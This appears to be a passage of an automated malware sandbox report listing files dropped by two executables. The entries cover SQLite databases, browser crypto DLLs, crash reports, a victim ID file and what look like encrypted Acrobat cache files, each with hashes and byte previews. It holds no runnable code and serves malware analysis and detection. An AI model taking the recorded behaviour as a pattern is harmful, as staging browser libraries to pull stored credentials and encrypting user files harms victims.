Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\51185885523034529471872333

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\51224069790673669744484117

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\68218024107050038942433297

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\71097549942730490560081234

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\71097549942730490560081234-shm

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\85492133724732645407289969

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\98810433852059922279171058

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_A079.exe_4ca7543aada27cc5e2db9351cb1db2602ba480_2d97dbee_db8f15df-9884-4cd5-945e-2ca0ee937805\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.6489668843382619
Encrypted:	false
SSDEEP:	96:7+wF0rSu8ptsqhYw7FYS3QXIDcQlc6JcE8cw3TB+HbHg/5hZAX/d5FMT2SlPkpX+:Xu8ptM07NG2jhzuiF2Z24IO80
MD5:	3EBDDF326D116165EA7A66EF63257AC4
SHA1:	3E0EBFD540C185FC08097BC7514C80434C670EDE
SHA-256:	8317D58DDE0136EEBA6FF7537164248BD69CCB8F7124BFFF5238E9C465DB98DB
SHA-512:	61089ED6FC0F706004346936F3C2E56D72DC68FE82B33A6EE8EC9F948AF2679EE038B0D28C8FB8B1E11B1ABD944C3B6FF476AC93FE07B1614A81B985F4E24E4E
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.1.6.7.6.8.6.0.3.9.9.3.7.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.1.6.7.6.8.6.1.4.3.0.6.2.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.8.f.1.5.d.f.-.9.8.8.4.-.4.c.d.5.-.9.4.5.e.-.2.c.a.0.e.e.9.3.7.8.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.b.4.2.6.c.0.b.-.3.7.9.0.-.4.e.9.f.-.8.a.d.c.-.6.8.b.0.8.6.1.c.0.a.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.0.7.9...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.d.c.-.0.0.0.1.-.0.0.1.4.-.0.c.6.7.-.c.4.1.8.d.8.f.d.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.a.7.b.4.b.2.e.3.b.5.c.9.a.b.5.b.b.0.6.b.a.3.a.a.f.e.2.e.7.8.f.0.0.0.0.f.f.f.f.!.0.0.0.0.8.2.1.2.0.a.b.7.d.0.2.3.1.0.c.f.7.d.f.c.c.1.a.1.f.6.c.1.d.c.d.6.c.3.b.f.3.e.6.7.!.A.0.7.9...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.1.0././.1.2.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2A8.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Oct 13 13:21:00 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	31100
Entropy (8bit):	1.714613278361919
Encrypted:	false
SSDEEP:	96:5Z8jE3haY8MZv/9+fi77vIrg5e/h8jSbkvbmqqhQZjYfrWIkWIsBmTt4Ucso7tu:InONlvbBif8t4Xso7U
MD5:	18427F4E2833DAAD0D05BE3382AB7251
SHA1:	7C1307596259D52DC33093C507937EF968F268DF
SHA-256:	C42E6FC47DE6CF6CBEBF255511612571CA418BFF5B762B6F49D05C25C96B7B7F
SHA-512:	A5B70350634087688B5FEF717ED290D6416DC2036891AFBC361E6B662E8B991B01FDA9BA475A0E47CF263F780BF43A9F1EF1B700224AF2C385FF9AB707B91357
Malicious:	false
Preview:	MDMP..a..... .......<D)e........................d...........................T.......8...........T...........`....o......................................................................................................eJ..............GenuineIntel............T...........7D)e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4EC.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.6885007359373057
Encrypted:	false
SSDEEP:	192:R6l7wVeJZ96HBQe6YEI4SUpIWgmf23pDg89bq6sfrOm:R6lXJz6HP6YE3SUp5gmf2PqZfb
MD5:	E4C6DF3D5AAE5A1C7D703BA5FA481D6B
SHA1:	A72D295A314583DB1D09C6A459DD1A3714C38039
SHA-256:	2EA16A0BD16321AC7CA3703571B413DC996326F6E1FEE30FD296FA3C63AE0DED
SHA-512:	FE7C38EF9CDFDD039C3043B5C16425CFC0F8418BFDE30BF646EB9A947D7BD3C987D3636A5E4703F462E015D52C135BC237C4257A4D5E279FA2A437947E454975
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB53B.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4637
Entropy (8bit):	4.412402087389545
Encrypted:	false
SSDEEP:	48:cvIwWl8zsAJg77aI97gWpW8VYlYm8M4JAMthI6FI+q8vhthI2HSfd:uIjfGI7ZZ7VRJAMbIzKhbI2HSfd
MD5:	B94977EF936AE2E76F49F352DF2296BB
SHA1:	2D101B78EE89E6E746AC08D1B04E541783144D01
SHA-256:	22CC1BEBC625A84D489C5F3E051FB55DC40D4E06C5B3B1DAEA9D18F83A8A5833
SHA-512:	8205111FBAEA1862F43F04D38E182306C47E68920763B0583992E3DC47C9B4B6C2E481AAE090D9C4E84D834CFC50BD12D4DE5D6F9F928386A09259E208B98ACA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="14663" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: E89IeuS2H1.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: wgdE3POxOg.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 1d591987233fea8f0cf1046ad2052645201a8ebbd788b3db04960e75.exe, Detection: malicious, Browse Filename: 336ecdd5f5c040f5d3fa238ae4b4813ebc48401500d2dfad0604fa9f.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.737322779818596
Encrypted:	false
SSDEEP:	3:TjrVKeSZT+UHGM8rxyhQovn:TFKeAT+CYrxoQovn
MD5:	8A4438B106CBCBA1284F9D62FA570372
SHA1:	889C1A9213189D24933900BF2CD8C2E53FCF4486
SHA-256:	3384C64148BD4CB93129CC3C7957E4833E328C586814AE73800862FC0CC1026D
SHA-512:	152DF2C8161920A023E65DBB6EBD8A4C1EE799891F572A629F09DE76B927033A1E7E58C875998209394CBEAFC54C84A635CC0EEB4B46C797F5D62F1E0F273A56
Malicious:	false
Preview:	H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5..

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	628
Entropy (8bit):	7.656914358765749
Encrypted:	false
SSDEEP:	12:ksmJjoaf9jdVeIONRhoyc6ZO2Fb5yKu8bcHUFTbryQ3cii9a:W1/7uXW215yKu8IH0bGabD
MD5:	3DD876F9DD2BEF58E054CBC88128A1CC
SHA1:	206D88B0855ED266A6370DB17B9E78972B19DA65
SHA-256:	89DC2C4D6C65AC982CA00AC80C0CBD56BFAE9C7CA3EC1876D77AE5AE4D31E2A0
SHA-512:	76E7A51400DA29843BEBF7D5ECBAAA362BFF6F1E02DC8253A8D84EC2FF8A99BA4D74AB1D7A9726F82A2B83E714C45F79FB8C2A6569A77D5FF0CCF60C205D4ABE
Malicious:	false
Preview:	2023/...<..Z...>.t..x.(.D..84`......]@.<c..L.,..r3\.D..l..t\|.."mI..z-....%.:q....h-WV.%#5..}.vg.......E.?j.b....iq..Me-......1.w..9. ......~%....U.nEujg5>......HCo..kkX.q.....t%...O.)G..d...3.lv...P.... .l..%o>..&.......hX......SR..e...=..k.....8..U;.....3...&....:......Z..{....B..M...\|..].)....2D$m^<..}n.(.K.;.O.......3[.D..r.......M./.....5.}...;{i..]d.+...,g2G..[.s..?..J.3....".... ..].P.".[\|.5..\|FW.?.=C.j.....2.{..@.U)Y.TP..\g.2x.o._B..`.Z..^d.....m....6'..Y.....R......)w.........`..l........$. .. .C...}JY[.n..H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	669
Entropy (8bit):	7.667666090538698
Encrypted:	false
SSDEEP:	12:kWZMpsfXE5JJPNS6l00QTKJd7f4CyoPru+zh4dT5kHAca0K8/dGFTbryQ3cii9a:zMJNPNSOITKUfoPru+zh4R5kgN0bdebH
